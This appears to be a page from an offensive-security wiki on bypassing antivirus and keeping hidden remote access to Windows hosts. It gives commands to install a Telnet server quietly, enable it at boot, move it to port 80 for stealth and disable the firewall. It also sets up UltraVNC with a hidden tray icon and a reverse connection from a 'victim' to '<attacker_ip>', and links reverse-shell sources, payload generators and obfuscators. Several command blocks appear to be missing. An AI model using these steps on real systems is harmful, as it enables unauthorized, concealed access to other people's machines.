AV Bypass
Telnet Server
Until Windows10, all Windows came with a Telnet server that you could install (as administrator) doing:
pkgmgr /iu:"TelnetServer" /quietMake it start when the system is started and run it now:
sc config TlntSVR start= auto obj= localsystemChange telnet port (stealth) and disable firewall:
tlntadmn config port=80
netsh advfirewall set allprofiles state offUltraVNC
Download it from: http://www.uvnc.com/downloads/ultravnc.html
Execute winvnc.exe and configure the server:
Enable the option Disable TrayIcon
Set a password in VNC Password
Set a password in View-Only Password
Then, move the binary winvnc.exe and newly created file UltraVNC.ini inside the victim
Reverse connection
The attacker should execute inside his host the binary vncviewer.exe -listen 5900 so it will be prepared to catch a reverse VNC connection.
Then, it should execute inside the victim: winwnc.exe [-autoreconnect] -connect <attacker_ip>::5900
GreatSCT
Download it from: https://github.com/GreatSCT/GreatSCT
Inside GreatSCT:
Now start the lister with msfconsole -r file.rc and execute the xml payload with:
Current defender will terminate the process very fast.
Compiling our own reverse shell
https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15
First C# Revershell
Compile it with:
Use it with:
C# using compiler
REV.txt: https://gist.github.com/BankSecurity/812060a13e57c815abe21ef04857b066
REV.shell: https://gist.github.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639
Automatic download and execution:
C# obfuscators list: https://github.com/NotPrab/.NET-Obfuscator
C++
https://github.com/paranoidninja/ScriptDotSh-MalwareDevelopment/blob/master/prometheus.cpp
Merlin, Empire, Puppy, SalsaTools https://astr0baby.wordpress.com/2013/10/17/customizing-custom-meterpreter-loader/
https://github.com/l0ss/Grouper2
Other tools
More
Last updated
